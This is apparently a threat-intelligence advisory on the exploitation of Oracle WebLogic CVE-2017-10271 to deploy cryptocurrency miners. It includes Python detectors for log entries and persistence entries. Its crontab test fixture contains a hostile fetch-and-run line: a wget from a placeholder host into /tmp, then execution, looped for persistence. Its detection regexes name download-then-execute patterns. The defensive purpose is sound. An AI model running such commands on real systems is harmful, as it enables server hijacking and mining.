Unpatched Oracle WebLogic Servers Infected with Cryptocurrency Software


By exploiting a known vulnerability on Internet-facing Oracle WebLogic servers, threat actors deployed cryptocurrency miners to Linux and Windows systems.

In December 2017, Secureworks incident response (IR) analysts responded to multiple incidents where threat actors compromised vulnerable Internet-facing Oracle WebLogic servers on Linux and Windows systems to deploy cryptocurrency software. The unauthorised activity significantly impacted the performance of business-critical and client-facing applications. The continued inquiries about this activity in January 2018 suggest that many organisations have been affected.

Triage of the available data from compromised Linux systems revealed binary files in the /tmp directory consuming processing power and causing performance degradation. When analysing infected hosts, IR analysts discovered a series of POST requests to /wls-wsat/CoordinatorPortType11 that resulted in an HTTP error code 500 (internal server error). The POST requests attempted to exploit WebLogic vulnerability CVE-2017-10271, which Oracle addressed in October 2017. According to the vulnerability description, this “easily exploitable” issue allows an “unauthenticated attacker with network access via HTTP to compromise [an] Oracle WebLogic Server.”
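The POST pattern described above can be hunted for in web server access logs. The following is an added example, not code from the article or from Secureworks: it parses constructed Combined Log Format lines, flags every POST to a /wls-wsat/ endpoint regardless of status code, and reports per-source counts together with how many of those requests returned HTTP 500.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not from the article); 203.0.113.5 and
# 198.51.100.20 are documentation addresses, not real indicators.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Dec/2017:03:14:07 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 1374 "-" "python-requests/2.18.4"
203.0.113.5 - - [12/Dec/2017:03:14:09 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 1374 "-" "python-requests/2.18.4"
198.51.100.20 - - [12/Dec/2017:03:15:22 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Dec/2017:03:16:40 +0000] "POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1" 500 1374 "-" "curl/7.55.1"
198.51.100.20 - - [12/Dec/2017:03:17:01 +0000] "POST /myapp/api/orders HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# Combined Log Format up to the status code; the rest of the line is not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def find_wls_wsat_posts(log_text):
    """Return one dict per POST to a /wls-wsat/ path (the WebLogic component
    targeted by CVE-2017-10271). Matching is on method and path only, so
    attempts that did not produce a 500 are still surfaced."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].lower().startswith("/wls-wsat/"):
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "path": m["path"], "status": int(m["status"])})
    return hits

def summarize(hits):
    """Group hits per source IP: total attempts, distinct paths, and how many
    returned HTTP 500, the status the article observed on exploitation attempts."""
    summary = defaultdict(lambda: {"attempts": 0, "http_500": 0, "paths": set()})
    for h in hits:
        s = summary[h["ip"]]
        s["attempts"] += 1
        s["paths"].add(h["path"])
        if h["status"] == 500:
            s["http_500"] += 1
    return dict(summary)

if __name__ == "__main__":
    for ip, s in summarize(find_wls_wsat_posts(SAMPLE_LOG)).items():
        print(f"{ip}: {s['attempts']} POST(s) to {sorted(s['paths'])}, "
              f"{s['http_500']} returned 500")
```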

Examination of client environments revealed at least two variations of a Bash script downloaded after successful exploitation. The first variation (see Figure 1) instructs the impacted system to use Wget to download “72 . 11 . 140 . 178/files/l/default” (MD5: faca70429c736dbf0caf2c644622078f) and save it to /tmp/rcp_bh. Once downloaded, rcp_bh is executed to run in the background on the compromised system.

Figure 1. Bash function to download cryptocurrency software. (Source: Secureworks)

The second script variation creates two persistence mechanisms based on the impacted service account name. As shown in Figure 2, the Bash script prints the name of the user account running the script. If the account is root, then root.sh is downloaded to /etc/root.sh and executed. If the user account is anything else, lower.sh is downloaded to the /tmp directory and executed.

Figure 2. Bash script identifying user. (Source: Secureworks)

If root.sh is executed, it downloads and executes “nativesvc” from 207 . 246 . 68 . 21. The script then establishes persistence on the compromised server by creating a cron job and modifying the rc.local file to continually check for the miner and download a new copy if the check fails. If lower.sh is executed, it downloads and executes a cryptocurrency mining binary file named “river” from 207 . 246 . 125 . 40 but does not create a persistence mechanism.
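The cron and rc.local persistence described for root.sh leaves text a responder can audit. The following is an added example, not code from the article or from Secureworks: it inspects constructed crontab and rc.local contents for the traits the article describes (execution out of /tmp, a download tool followed by execution, and a check-then-refetch loop). The hostname in the sample is a placeholder, and the rule set is a heuristic, not a complete signature.

```python
import re

# Constructed sample inputs (not from the article): a root crontab and an rc.local
# modelled on the behaviour described for root.sh, plus benign entries for contrast.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * /bin/sh -c 'pgrep -f nativesvc || (wget -q -O /tmp/nativesvc http://PLACEHOLDER_HOST/files/nativesvc && chmod +x /tmp/nativesvc && /tmp/nativesvc)'
30 4 * * 0 /usr/local/bin/backup.sh
"""

SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
/usr/sbin/service smartd start
/tmp/watch-smartd &
exit 0
"""

# Heuristics drawn from the article's description of the root.sh persistence.
RULES = {
    "exec_from_tmp": re.compile(r"(?<![\w/])/tmp/[\w.-]+"),
    "download_then_exec": re.compile(r"\b(wget|curl)\b.*(&&|;|\|).*(chmod\s+\+x|/bin/sh|/bin/bash|\./)"),
    "pgrep_refetch_loop": re.compile(r"\bpgrep\b.*\|\|.*\b(wget|curl)\b"),
}

def strip_cron_schedule(line):
    """Drop the five schedule fields (or an @reboot-style tag) so only the command is inspected."""
    if line.startswith("@"):
        return line.split(None, 1)[1] if " " in line else ""
    parts = line.split(None, 5)
    return parts[5] if len(parts) == 6 else line

def audit_persistence(crontab_text, rc_local_text):
    """Return (source, command, [matched rule names]) for every entry that trips a rule."""
    findings = []
    sources = [("crontab", crontab_text, True), ("rc.local", rc_local_text, False)]
    for name, text, is_cron in sources:
        for raw in text.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue  # blank lines, comments and the shebang carry no command
            cmd = strip_cron_schedule(line) if is_cron else line
            matched = [rule for rule, rx in RULES.items() if rx.search(cmd)]
            if matched:
                findings.append((name, cmd, matched))
    return findings

if __name__ == "__main__":
    for source, cmd, rules in audit_persistence(SAMPLE_CRONTAB, SAMPLE_RC_LOCAL):
        print(f"[{source}] {', '.join(rules)}: {cmd}")
```

On a live host the same function can be fed the output of `crontab -l` for each account and the contents of /etc/rc.local; a hit is a starting point for review, not proof of compromise.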

Windows hosts running vulnerable Oracle WebLogic servers have also been targeted. Observed attacks have downloaded open-source miners such as XMRig.

These incidents are representative of broader campaigns by financially motivated threat actors to deploy cryptocurrency mining software to large numbers of infected hosts. The market valuation of various cryptocurrencies and the ability to outsource resource costs associated with mining make this kind of activity attractive to threat actors. This type of activity will likely continue as long as cryptocurrency mining provides a return on investment for generating funds.

In addition to reviewing and applying the Oracle security update as appropriate, network defenders should implement the following mitigations. These mitigations also protect systems against other types of threats.

  • Disable unnecessary services, including internal network protocols such as SMBv1 if possible. Remove applications that do not serve a legitimate business function, and consider restricting access to integral system components such as PowerShell that cannot be removed but are unnecessary for most users.
  • Review and apply appropriate security updates for operating systems and applications in a timely manner.
  • Apply the principle of least privilege for system and application credentials, limiting administrator-level access to authorised users and contexts. For Windows systems, consider a solution such as Microsoft’s Local Administrator Password Solution (LAPS) to simplify and strengthen password management.
  • If possible, implement endpoint and network security technologies and centralised logging to detect, restrict, and capture malicious activity. Managing outbound network connections through monitored egress points can help to identify outbound cryptocurrency mining traffic, particularly unencrypted traffic using non-standard ports.

The indicators in Table 1 are associated with this threat. Note that IP addresses can be reallocated. The domains and IP addresses may contain malicious content, so consider the risks before opening them in a browser.


Table 1. Indicators for this threat.
